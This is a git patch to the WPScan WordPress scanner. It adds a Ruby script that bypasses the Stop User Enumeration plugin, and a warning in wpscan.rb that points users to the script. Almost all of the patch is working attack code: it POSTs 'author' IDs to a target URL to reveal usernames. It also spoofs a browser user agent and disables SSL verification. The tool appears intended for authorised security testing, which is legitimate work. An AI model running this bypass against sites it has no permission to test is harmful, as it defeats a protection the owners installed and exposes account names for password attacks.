From 45f5f50262b71bd864e012637d8e383ce470bf05 Mon Sep 17 00:00:00 2001
From: erwanlr <erwan.lr@gmail.com>
Date: Wed, 16 Apr 2014 15:09:41 +0200
Subject: [PATCH] Fixes #456 - stop-user-enumeration detection & script for
 bypass

---
 stop_user_enumeration_bypass.rb | 73 +++++++++++++++++++++++++++++++++
 wpscan.rb                       |  5 +++
 2 files changed, 78 insertions(+)
 create mode 100755 stop_user_enumeration_bypass.rb

diff --git a/stop_user_enumeration_bypass.rb b/stop_user_enumeration_bypass.rb
new file mode 100755
index 00000000..af631471
--- /dev/null
+++ b/stop_user_enumeration_bypass.rb
@@ -0,0 +1,73 @@
+#!/usr/bin/env ruby
+# encoding: UTF-8
+#
+#
+# Script based on http://seclists.org/fulldisclosure/2014/Feb/3
+
+require File.join(File.dirname(__FILE__), 'lib/wpscan/wpscan_helper')
+
+@opts = {
+  ids: 1..10,
+  verbose: false,
+  user_agent: 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:9.0) Gecko/20100101 Firefox/9.0'
+}
+
+parser = OptionParser.new('Usage: ./stop_user_enumeration_bypass.rb <Target URL> [options]', 35) do |opts|
+  opts.on('--proxy PROXY', 'Proxy to use') do |proxy|
+    @opts[:proxy] = proxy
+  end
+
+  opts.on('--auth Username:Password', 'Credentials to use if Basic/NTLM auth') do |creds|
+    @opts[:creds] = creds
+  end
+
+  opts.on('--ids START-END', 'The ids to check, default is 1-10') do |ids|
+    @opts[:ids] = Range.new(*ids.split('-').map(&:to_i))
+  end
+
+  opts.on('--user-agent UA', 'The user-agent to use') do |ua|
+    @opts[:user_agent] = ua
+  end
+
+  opts.on('--verbose', '-v', 'Verbose Mode') do
+    @opts[:verbose] = true
+  end
+end
+
+begin
+  parser.parse!
+
+  fail "#{red('The target URL must be supplied')}\n\n#{parser}" unless ARGV[0]
+
+  uri = URI.parse(add_trailing_slash(add_http_protocol(ARGV[0])))
+
+  request_params = {
+    proxy: @opts[:proxy],
+    userpwd: @opts[:creds],
+    headers: { 'User-Agent' => @opts[:user_agent] },
+    followlocation: true,
+    ssl_verifypeer: false,
+    ssl_verifyhost: 2
+  }
+
+  detected_users = WpUsers.new
+
+  @opts[:ids].each do |user_id|
+    user = WpUser.new(uri, id: user_id)
+
+    if user.exists_from_response?(Typhoeus.post(uri, request_params.merge(body: { author: user_id })))
+      detected_users << user
+    end
+  end
+
+  puts 'Usernames found:'
+  detected_users.output
+rescue => e
+  puts e.message
+
+  if @opts[:verbose]
+    puts red('Trace:')
+    puts red(e.backtrace.join("\n"))
+  end
+  exit(1)
+end
diff --git a/wpscan.rb b/wpscan.rb
index ea279ced..2239085c 100755
--- a/wpscan.rb
+++ b/wpscan.rb
@@ -296,6 +296,11 @@ def main
       puts
       puts "#{green('[+]')} Enumerating usernames ..."
 
+      if wp_target.has_plugin?('stop-user-enumeration')
+        puts "#{red('[!]')} Stop User Enumeration plugin detected, results might be empty. " \
+             "However a bypass exists, see stop_user_enumeration_bypass.rb in #{File.expand_path(File.dirname(__FILE__))}"
+      end
+
       wp_users = WpUsers.aggressive_detection(wp_target,
         enum_options.merge(
           range: wpscan_options.enumerate_usernames_range,